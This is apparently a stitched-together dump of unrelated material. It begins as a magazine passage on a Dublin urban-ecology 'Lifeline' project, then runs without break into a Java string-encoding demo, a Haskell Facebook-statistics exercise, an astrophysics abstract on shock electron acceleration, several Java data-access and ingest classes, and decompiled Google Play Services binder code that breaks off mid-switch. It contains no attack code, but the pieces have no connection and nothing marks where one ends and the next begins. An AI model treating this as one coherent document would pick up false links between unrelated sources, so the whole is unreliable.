Burt-O’Dea’s reclamation project, which aims to rejuvenate this “urban quarter” in rather different ways. It is still in the early planning stage, and to access the site we have had to sneak through a gap in the railings. This has long been a troubled spot, particularly the unmonitored Broombridge train station nearby, which is notorious for anti-social behaviour. Part of the remit of the Lifeline is to involve local communities, a task that might prove tricky, given local scepticism of terms such as “urban ecology”. Burt-O’Dea talks passionately about the projects she has in mind – allotments, roof-top apiaries – low-level, open-access projects that people can get involved in if they wish, and that she hopes will change the neighbourhood little by little. 
Uncherished overgrowth

The Lifeline will be delivered in tandem with the installation of the Luas along the disused Midland Great Western Railway between Broadstone Station and Broombridge. Since 1961, the only glimpse most Dubliners have had of this line has been from one of the three road bridges overhead, from which you can look down on to a dense mass of uncherished overgrowth, scattered with old couches, electrical items and plastic bags. But walking the line opens up a different perspective. Too often these derelict sites are overlooked as wastelands, suitable only for development or “regeneration”. Burt-O’Dea thinks otherwise. For her, this is a rare site of natural biodiversity in the city that is worth cultivating. She says there could be 10 years’ work in it, but seems to relish the challenge, believing this kind of economy is what makes a city work. For her, the Lifeline is all about waste. The modern urban environment is inexorably wasteful. Beyond the day-to-day waste we generate ourselves, there is a sea of wasted resources and wasted human potential. Burt-O’Dea takes a robust, practical approach to urban waste. Like the railway builders before her, she is a pragmatist at heart who would like to see neglected resources put to use. The Lifeline will generate cottage industries, producing soap out of waste oil from chippers and restaurants. It will establish apiaries in the north-west inner city where people will be able to train as beekeepers and to bottle local honey, pollinated along the Lifeline and the nearby Botanic Gardens. In fact, bees’ working patterns – the commonage, the hive, the freedom from boundaries – will provide a model for the project as a whole, a way of thinking about the connections between productivity and urban communities.
Burt-O’Dea has already begun to produce a range of soaps and foot soaks for sale, using waste materials from companies such as the Real Olive Co in Stoneybatter, to demonstrate the kinds of activities and products that can be expected from the Lifeline. Most importantly, she believes the project will be thoroughly sustainable. What becomes clear, as we talk, is that the Lifeline is about much more than this single strip of land. It is a symbolic struggle: a contest over how we view, and use, our city. She encounters a particular mentality when she talks to development agencies, she tells me. “If I want to build a bridge, say, there’s a process. We bring in agencies, we apply to Europe, we fly in [Spanish architect Santiago] Calatrava. It’s on that scale. It’s just so removed. And I’m thinking, couldn’t we stage a competition, get designs for temporary pontoon bridges made out of, I don’t know, plastic bottles?” She’s exaggerating, but she has a point. The Grangegorman Urban Quarter website demonstrates the kind of sanitised, overdesigned environment envisioned for the area. Burt-O’Dea is not interested in these pristine, privatised spaces. For her, a genuine public space in the city requires hands-on involvement and a readiness to react. It’s not enough to just wade in with a series of prescriptions. You have to engage with the realities of the city and be prepared for them to shift. “Just look at this train line,” she says. “They built a whole strip of canal to service it, and it was only operational for 30 years. You have to be ready for change. That’s the mistake, planning for permanence. You’ve got to always be reacting.”

Constant change

For Burt-O’Dea, as for the railway builders, this is what cities are about: constant change. A city isn’t a problem to be solved, she says, it’s something that will always be evolving. This ethos, I suggest, might place her at odds with the interests of centralised urban planning. “That’s true.
This is absolutely not the top-down agency approach. I don’t believe in that kind of prescriptive approach. But of course, without planning, there’s the danger it’ll end in chaos.” She pauses. “It’s striking the balance. That’s the challenge.” That challenge will underpin the whole project. We are effectively trespassing on the site. The Guinness grant is one thing, but a project of this magnitude will require more. Where will it come from? Are the Railway Procurement Agency, for instance, really going to give more than lip service to the Lifeline? It’s easy to be sceptical. This kind of close-focused enthusiasm will hardly be enough to challenge the heavily financed forces of urban development. Yet there is something contagious about Burt-O’Dea’s conviction. Her eye for detail informs a much broader vision, of a sort of Eden in northside Dublin. And standing on the overgrown line, under the Liam Whelan Bridge, it feels not only possible, but valuable, necessary and brave. A version of this article appeared in We Are Dublin, a new quarterly of long-form writing, wearedublin.ie
import java.io.BufferedWriter;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.OutputStreamWriter;
import java.io.PrintWriter;
import java.nio.charset.Charset;
import java.nio.file.Paths;

/**
 * encoding for String
 *
 * @author zeno (Sven Augustus)
 * @version 1.0
 */
public class T01_StringEncodeDecode {

    static final Charset GBK = Charset.forName("GBK");
    static final Charset GB2312 = Charset.forName("GB2312");

    public static void main(String[] args) throws IOException {
        final String srcString = new String("s中文123456");
        // UTF to GBK
        final byte[] gbkBytes = srcString.getBytes(GBK);
        writeFile(gbkBytes, GBK);
        byte[] gbkBytesFromFile = readFile(GBK);
        final String gbkString = new String(gbkBytesFromFile);
        System.out.println("gbkString from gbk file -> " + gbkString);
        // GBK to UTF8
        final String utf8String = new String(gbkBytesFromFile, GBK);
        System.out.println("utf8String from gbk file-> " + utf8String);
        // GBK to GB2312
        writeFile(gbkBytesFromFile, GB2312);
        byte[] gb2312BytesFromFile = readFile(GB2312);
        System.out.println("utf8String from gb2312 file-> " + new String(gb2312BytesFromFile, GB2312));
    }

    protected static void writeFile(byte[] bytes, Charset charset) throws IOException {
        final String x = new String(bytes, charset);
        final File f = getFile(charset);
        try (PrintWriter pw = new PrintWriter(
                new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f), charset)))) {
            pw.write(x);
            pw.flush();
        }
    }

    protected static byte[] readFile(Charset charset) throws IOException {
        final File f = getFile(charset);
        byte[] bytes = new byte[(int) f.length()];
        try (FileInputStream fis = new FileInputStream(f)) {
            int i = fis.read(bytes);
            while (i > 0) {
                i = fis.read(bytes, i, bytes.length - i);
            }
        }
        return bytes;
    }

    private static File getFile(Charset charset) {
        return Paths.get("/var/tmp/" + charset.name() + ".txt").toFile();
    }
}
module Y2017.M08.D31.Solution where

import Control.Arrow ((&&&))
import qualified Data.ByteString.Lazy.Char8 as BL
import Data.List (sortOn)
import Data.Map (Map)
import qualified Data.Map as Map
import Data.Ord
import Data.Ratio ((%))
import Network.HTTP.Conduit

-- below imports available via 1HaskellADay git repository

import Data.Percentage

-- Today's exercise comes by way of the tweep, @ahnqir.

url :: FilePath
url = "https://raw.githubusercontent.com/geophf/1HaskellADay/master/exercises/HAD/Y2017/M08/D31/fb-users.txt"

{--
The above URL contains the top 10 facebook user-counts by country.

Read in the above file, parse it, then output the percentage of facebook
users per country (with the narrowed focus that the top 10 countries
comprise 'all' (most, actually) of the facebook users, so we're 'sampling'
the entire (100%) set.
--}

type Country = String
type Count = Integer
type FBusers = Map Country

parseMillions :: String -> Integer
parseMillions = (* 1000000) . read . init

readFBusers :: FilePath -> IO (FBusers Count)
readFBusers =
   fmap (Map.fromList . map ((head &&& parseMillions . last) . words)
       . drop 3 . lines . BL.unpack) . simpleHttp

{--
>>> readFBusers url
fromList [("Brazil",139000000),("India",241000000),("Indonesia",126000000),
("Mexico",85000000),("Philippines",69000000),("Thailand",57000000),
("Turkey",56000000),("UK",44000000),("USA",240000000),
("Vietnam",64000000)]
--}

percentageFBusersByCountry :: FBusers Count -> FBusers Percentage
percentageFBusersByCountry counts =
   let total = sum (Map.elems counts)
   in  Map.map (P . (% total)) counts

{--
>>> percentageFBusersByCountry <$> readFBusers url
fromList [("Brazil",12.39%),("India",21.49%),("Indonesia",11.23%),
("Mexico",7.58%),("Philippines",6.15%),("Thailand",5.08%),
("Turkey",4.99%),("UK",3.92%),("USA",21.40%),("Vietnam",5.70%)]
--}

{-- BONUS -----------------------------------------------------------------

Using whatever charting software you like, chart the facebook users (count)
by country.
--}

-- one way to do this is to output it as CSV and let your spreadsheet chart it

chartFBusers :: Ord a => Show a => FilePath -> FBusers a -> IO ()
chartFBusers outputfile =
   writeFile outputfile . unlines . ("Country,FB Users":)
      . map tup2line . sortOn (Down . snd) . Map.toList
   where tup2line (country,count) = country ++ (',':show count)

{--
>>> readFBusers url >>= chartFBusers "Y2017/M08/D31/chart.csv"
--}
/**
 * This method updates the progress in the view. It is responsible for
 * updating the counters.
 */
private void refreshCounters() {
    int startedCount;
    int currentCount;
    int totalCount;
    int errorCount;
    boolean hasErrors;
    boolean stopped;

    if (benchRunSession == null) {
        startedCount = 0;
        currentCount = 0;
        totalCount = 0;
        errorCount = 0;
        hasErrors = false;
        stopped = false;
    } else {
        startedCount = benchRunSession.getStartedCount();
        currentCount = benchRunSession.getCurrentCount();
        totalCount = benchRunSession.getTotalCount();
        errorCount = benchRunSession.getErrorCount();
        hasErrors = errorCount > 0;
        stopped = benchRunSession.isStopped();
    }

    int ticksDone;
    if (startedCount == currentCount) {
        ticksDone = startedCount;
    } else {
        ticksDone = currentCount;
    }

    benchCounterPanel.setTotalRuns(totalCount);
    benchCounterPanel.setBenchRuns(ticksDone);
    benchCounterPanel.setBenchErrors(errorCount);
    progressBar.reset(hasErrors, stopped, ticksDone, totalCount);
}
Electron Acceleration at Rippled Low Mach Number Shocks in Merging Galaxy Clusters

Shock waves are ubiquitous in cosmic plasmas, wherein they accelerate particles. In particular, X-ray and radio observations of so-called radio relics indicate electron acceleration at large-scale merger shocks in galaxy clusters. These shocks are also candidate sites for ultra-high-energy cosmic ray production. Merger shocks have low Mach numbers and propagate in hot plasmas with plasma beta $\beta\gg 1$. Particle energization, and especially electron injection mechanisms, are poorly understood in such conditions. Recent studies show that shock drift acceleration (SDA) accompanied by particle-wave interactions can provide electron acceleration, although a multi-scale shock structure in the form of ion-scale shock rippling may significantly alter the injection mechanisms. Here we study the effects of shock rippling with large-scale 2D PIC simulations of low Mach number cluster shocks. We find that the electron acceleration rate increases considerably after the appearance of wave-rippling modes. The main acceleration process is stochastic SDA, in which electrons are confined in the shock transition region by pitch-angle scattering off magnetic turbulence and gain energy from the motional electric field. The presence of multi-scale turbulence in the shock is essential for particle energization. Wide-energy non-thermal electron distributions are formed both upstream and downstream of the shock. We show for the first time that the downstream electron spectrum has a power-law form with index $p = 2.4$, in agreement with observations.
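For reference, the two quantities the abstract invokes can be written out explicitly (these are the standard textbook definitions, not additional results from the paper):

```latex
\mathbf{E}_{\mathrm{mot}} = -\frac{\mathbf{v}}{c}\times\mathbf{B},
\qquad
\frac{dN}{dE} \propto E^{-p}, \quad p \simeq 2.4,
```

where $\mathbf{v}$ is the local plasma flow velocity and $\mathbf{B}$ the magnetic field. Electrons confined near the shock transition by pitch-angle scattering repeatedly sample $\mathbf{E}_{\mathrm{mot}}$ while drifting, which is what makes the stochastic SDA energy gain possible.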
package org.broadinstitute.ddp.db.dao;

import java.util.List;

import org.broadinstitute.ddp.model.dsm.OnDemandActivity;
import org.broadinstitute.ddp.model.dsm.TriggeredInstance;
import org.jdbi.v3.sqlobject.SqlObject;
import org.jdbi.v3.sqlobject.config.RegisterConstructorMapper;
import org.jdbi.v3.sqlobject.customizer.Bind;
import org.jdbi.v3.sqlobject.statement.SqlQuery;
import org.jdbi.v3.stringtemplate4.UseStringTemplateSqlLocator;

public interface DsmOnDemandActivityDao extends SqlObject {

    @UseStringTemplateSqlLocator
    @SqlQuery("queryAllOrderedOnDemandActivitiesByStudyId")
    @RegisterConstructorMapper(OnDemandActivity.class)
    List<OnDemandActivity> findAllOrderedOndemandActivitiesByStudy(@Bind("studyId") long studyId);

    @UseStringTemplateSqlLocator
    @SqlQuery("queryAllTriggeredInstancesByStudyIdAndActivityId")
    @RegisterConstructorMapper(TriggeredInstance.class)
    List<TriggeredInstance> findAllTriggeredInstancesByStudyAndActivity(@Bind("studyId") long studyId,
            @Bind("activityId") long activityId);
}
/*
 * Copyright 2012 hbz NRW (http://www.hbz-nrw.de/)
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 *
 */
package de.nrw.hbz.regal.sync.ingest;

import java.io.File;
import java.util.HashMap;
import java.util.Vector;

import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.w3c.dom.Element;
import org.w3c.dom.NodeList;

import archive.fedora.XmlUtils;
import de.nrw.hbz.regal.sync.extern.DigitalEntity;
import de.nrw.hbz.regal.sync.extern.DigitalEntityBuilderInterface;
import de.nrw.hbz.regal.sync.extern.Md5Checksum;
import de.nrw.hbz.regal.sync.extern.StreamType;

/**
 * @author <NAME> <EMAIL>
 */
public class OpusDigitalEntityBuilder implements DigitalEntityBuilderInterface {

    final static Logger logger = LoggerFactory.getLogger(OpusDigitalEntityBuilder.class);

    HashMap<String, DigitalEntity> map = new HashMap<String, DigitalEntity>();

    @Override
    public DigitalEntity build(String baseDir, String pid) {
        // pid = pid.replace(':', '-');
        if (!map.containsKey(pid)) {
            DigitalEntity e = new DigitalEntity(baseDir);
            e.setPid(pid);
            // store reference to e
            map.put(pid, e);
            // update Reference
            e = buildDigitalEntity(baseDir, pid, e);
            return e;
        }
        return map.get(pid);
    }

    private DigitalEntity buildDigitalEntity(String baseDir, String pid, DigitalEntity dtlDe) {
        // dtlDe = new DigitalEntity(baseDir);
        File file = new File(baseDir + File.separator + pid + ".xml");
        String md5Hash = getMd5(file);
        dtlDe.addStream(file, "application/xml", StreamType.xMetaDissPlus, null, md5Hash);
        try {
            Vector<String> files = new Vector<String>();
            Element root = XmlUtils.getDocument(file);
            // dtlDe.setDc(nodeToString(root));
            NodeList list = root.getElementsByTagName("dc:title");
            if (list != null && list.getLength() > 0) {
                dtlDe.setLabel(list.item(0).getTextContent());
            }
            list = root.getElementsByTagName("dc:type");
            if (list != null && list.getLength() > 0) {
                for (int i = 0; i < list.getLength(); i++) {
                    Element el = (Element) list.item(i);
                    String type = el.getAttribute("xsi:type");
                    if (type.compareTo("oai:pub-type") == 0) {
                        dtlDe.setType(el.getTextContent());
                    }
                }
            }
            NodeList fileProperties = root.getElementsByTagName("ddb:fileProperties");
            for (int i = 0; i < fileProperties.getLength(); i++) {
                Element fileProperty = (Element) fileProperties.item(i);
                String filename = fileProperty.getAttribute("ddb:fileName");
                files.add(filename);
            }
            int i = 0;
            for (String f : files) {
                if (f.endsWith("pdf")) {
                    i++;
                    File fi = new File(baseDir + File.separator + pid + "_" + i + ".pdf");
                    String md5h = getMd5(fi);
                    dtlDe.addStream(fi, "application/pdf", StreamType.DATA, null, md5h);
                }
            }
        } catch (Exception e) {
            logger.debug(e.getMessage());
        }
        return dtlDe;
    }

    private String getMd5(File stream) {
        Md5Checksum md5 = new Md5Checksum();
        return md5.getMd5Checksum(stream);
    }
}
package com.google.android.gms.common.internal;

import android.os.Binder;
import android.os.Bundle;
import android.os.IBinder;
import android.os.IInterface;
import android.os.Parcel;
import com.andi.alquran.C0861R;
import com.google.ads.AdSize;
import com.google.android.gms.C1114a.C1096c;
import com.google.android.gms.common.internal.C1330w.C1331a;
import com.google.android.gms.maps.GoogleMap;

/* renamed from: com.google.android.gms.common.internal.x */
public interface C1359x extends IInterface {

    /* renamed from: com.google.android.gms.common.internal.x.a */
    public static abstract class C1361a extends Binder implements C1359x {

        /* renamed from: com.google.android.gms.common.internal.x.a.a */
        private static class C1360a implements C1359x {

            private IBinder f3141a;

            C1360a(IBinder iBinder) {
                this.f3141a = iBinder;
            }

            public void m4860a(C1330w c1330w, zzan com_google_android_gms_common_internal_zzan) {
                Parcel obtain = Parcel.obtain();
                Parcel obtain2 = Parcel.obtain();
                try {
                    obtain.writeInterfaceToken("com.google.android.gms.common.internal.IGmsServiceBroker");
                    obtain.writeStrongBinder(c1330w != null ? c1330w.asBinder() : null);
                    if (com_google_android_gms_common_internal_zzan != null) {
                        obtain.writeInt(1);
                        com_google_android_gms_common_internal_zzan.writeToParcel(obtain, 0);
                    } else {
                        obtain.writeInt(0);
                    }
                    this.f3141a.transact(47, obtain, obtain2, 0);
                    obtain2.readException();
                } finally {
                    obtain2.recycle();
                    obtain.recycle();
                }
            }

            public void m4861a(C1330w c1330w, zzj com_google_android_gms_common_internal_zzj) {
                Parcel obtain = Parcel.obtain();
                Parcel obtain2 = Parcel.obtain();
                try {
                    obtain.writeInterfaceToken("com.google.android.gms.common.internal.IGmsServiceBroker");
                    obtain.writeStrongBinder(c1330w != null ? c1330w.asBinder() : null);
                    if (com_google_android_gms_common_internal_zzj != null) {
                        obtain.writeInt(1);
                        com_google_android_gms_common_internal_zzj.writeToParcel(obtain, 0);
                    } else {
                        obtain.writeInt(0);
                    }
                    this.f3141a.transact(46, obtain, obtain2, 0);
                    obtain2.readException();
                } finally {
                    obtain2.recycle();
                    obtain.recycle();
                }
            }

            public IBinder asBinder() {
                return this.f3141a;
            }
        }

        public static C1359x m4862a(IBinder iBinder) {
            if (iBinder == null) {
                return null;
            }
            IInterface queryLocalInterface = iBinder.queryLocalInterface("com.google.android.gms.common.internal.IGmsServiceBroker");
            return (queryLocalInterface == null || !(queryLocalInterface instanceof C1359x)) ? new C1360a(iBinder) : (C1359x) queryLocalInterface;
        }

        public boolean onTransact(int i, Parcel parcel, Parcel parcel2, int i2) {
            zzan com_google_android_gms_common_internal_zzan = null;
            C1330w a;
            switch (i) {
                case GoogleMap.MAP_TYPE_NORMAL /*1*/:
                    parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker");
                    C1331a.m4721a(parcel.readStrongBinder());
                    parcel.readInt();
                    parcel.readString();
                    parcel.readString();
                    parcel.createStringArray();
                    parcel.readString();
                    if (parcel.readInt() != 0) {
                        Bundle.CREATOR.createFromParcel(parcel);
                    }
                    parcel2.writeNoException();
                    return true;
                case GoogleMap.MAP_TYPE_SATELLITE /*2*/:
                    parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker");
                    C1331a.m4721a(parcel.readStrongBinder());
                    parcel.readInt();
                    parcel.readString();
                    if (parcel.readInt() != 0) {
                        Bundle.CREATOR.createFromParcel(parcel);
                    }
                    parcel2.writeNoException();
                    return true;
                case GoogleMap.MAP_TYPE_TERRAIN /*3*/:
                    parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker");
                    C1331a.m4721a(parcel.readStrongBinder());
                    parcel.readInt();
                    parcel.readString();
                    parcel2.writeNoException();
                    return true;
                case GoogleMap.MAP_TYPE_HYBRID /*4*/:
                    parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker");
                    C1331a.m4721a(parcel.readStrongBinder());
                    parcel.readInt();
                    parcel2.writeNoException();
                    return true;
                case C1096c.MapAttrs_cameraZoom /*5*/:
                    parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker");
                    C1331a.m4721a(parcel.readStrongBinder());
                    parcel.readInt();
                    parcel.readString();
                    if (parcel.readInt() != 0) {
                        Bundle.CREATOR.createFromParcel(parcel);
                    }
                    parcel2.writeNoException();
                    return true;
                case C1096c.MapAttrs_liteMode /*6*/:
                    parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker");
                    C1331a.m4721a(parcel.readStrongBinder());
                    parcel.readInt();
                    parcel.readString();
                    if (parcel.readInt() != 0) {
                        Bundle.CREATOR.createFromParcel(parcel);
                    }
                    parcel2.writeNoException();
                    return true;
                case C1096c.MapAttrs_uiCompass /*7*/:
                    parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker");
                    C1331a.m4721a(parcel.readStrongBinder());
                    parcel.readInt();
                    parcel.readString();
                    if (parcel.readInt() != 0) {
                        Bundle.CREATOR.createFromParcel(parcel);
                    }
                    parcel2.writeNoException();
                    return true;
                case C1096c.MapAttrs_uiRotateGestures /*8*/:
                    parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker");
                    C1331a.m4721a(parcel.readStrongBinder());
                    parcel.readInt();
                    parcel.readString();
                    if (parcel.readInt() != 0) {
                        Bundle.CREATOR.createFromParcel(parcel);
                    }
                    parcel2.writeNoException();
                    return true;
                case C1096c.MapAttrs_uiScrollGestures /*9*/:
                    parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker");
                    C1331a.m4721a(parcel.readStrongBinder());
                    parcel.readInt();
                    parcel.readString();
                    parcel.readString();
                    parcel.createStringArray();
                    parcel.readString();
                    parcel.readStrongBinder();
                    parcel.readString();
                    if (parcel.readInt() != 0) {
                        Bundle.CREATOR.createFromParcel(parcel);
                    }
                    parcel2.writeNoException();
                    return true;
                case C1096c.MapAttrs_uiTiltGestures /*10*/:
                    parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker");
                    C1331a.m4721a(parcel.readStrongBinder());
                    parcel.readInt();
                    parcel.readString();
parcel.readString(); parcel.createStringArray(); parcel2.writeNoException(); return true; case C1096c.MapAttrs_uiZoomControls /*11*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C1096c.MapAttrs_uiZoomGestures /*12*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C1096c.MapAttrs_useViewLifecycle /*13*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C1096c.MapAttrs_zOrderOnTop /*14*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C1096c.MapAttrs_uiMapToolbar /*15*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C1096c.MapAttrs_ambientEnabled /*16*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } 
parcel2.writeNoException(); return true; case C1096c.MapAttrs_cameraMinZoomPreference /*17*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C1096c.MapAttrs_cameraMaxZoomPreference /*18*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C1096c.MapAttrs_latLngBoundsSouthWestLatitude /*19*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel.readStrongBinder(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C1096c.MapAttrs_latLngBoundsSouthWestLongitude /*20*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel.createStringArray(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C1096c.MapAttrs_latLngBoundsNorthEastLatitude /*21*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel2.writeNoException(); return true; case C1096c.MapAttrs_latLngBoundsNorthEastLongitude /*22*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel2.writeNoException(); return true; case 
C0861R.styleable.Toolbar_collapseContentDescription /*23*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C0861R.styleable.Toolbar_navigationIcon /*24*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel2.writeNoException(); return true; case C0861R.styleable.Toolbar_navigationContentDescription /*25*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C0861R.styleable.Toolbar_logoDescription /*26*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel2.writeNoException(); return true; case C0861R.styleable.Toolbar_titleTextColor /*27*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C0861R.styleable.Toolbar_subtitleTextColor /*28*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); parcel2.writeNoException(); return true; case C0861R.styleable.AppCompatTheme_actionModeSplitBackground /*30*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel.readString(); 
parcel.createStringArray(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C0861R.styleable.AppCompatTheme_actionModeCloseDrawable /*31*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel2.writeNoException(); return true; case AdSize.LANDSCAPE_AD_HEIGHT /*32*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel2.writeNoException(); return true; case C0861R.styleable.AppCompatTheme_actionModeCopyDrawable /*33*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel.readString(); parcel.readString(); parcel.createStringArray(); parcel2.writeNoException(); return true; case C0861R.styleable.AppCompatTheme_actionModePasteDrawable /*34*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel.readString(); parcel2.writeNoException(); return true; case C0861R.styleable.AppCompatTheme_actionModeSelectAllDrawable /*35*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel2.writeNoException(); return true; case C0861R.styleable.AppCompatTheme_actionModeShareDrawable /*36*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel2.writeNoException(); return true; case C0861R.styleable.AppCompatTheme_actionModeFindDrawable /*37*/: 
parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C0861R.styleable.AppCompatTheme_actionModeWebSearchDrawable /*38*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C0861R.styleable.AppCompatTheme_textAppearanceLargePopupMenu /*40*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel2.writeNoException(); return true; case C0861R.styleable.AppCompatTheme_textAppearanceSmallPopupMenu /*41*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C0861R.styleable.AppCompatTheme_textAppearancePopupMenuHeader /*42*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); parcel2.writeNoException(); return true; case C0861R.styleable.AppCompatTheme_dialogTheme /*43*/: parcel.enforceInterface("com.google.android.gms.common.internal.IGmsServiceBroker"); C1331a.m4721a(parcel.readStrongBinder()); parcel.readInt(); parcel.readString(); if (parcel.readInt() != 0) { Bundle.CREATOR.createFromParcel(parcel); } parcel2.writeNoException(); return true; case C0861R.styleable.AppCompatTheme_dialogPreferredPadding /*44*/: 
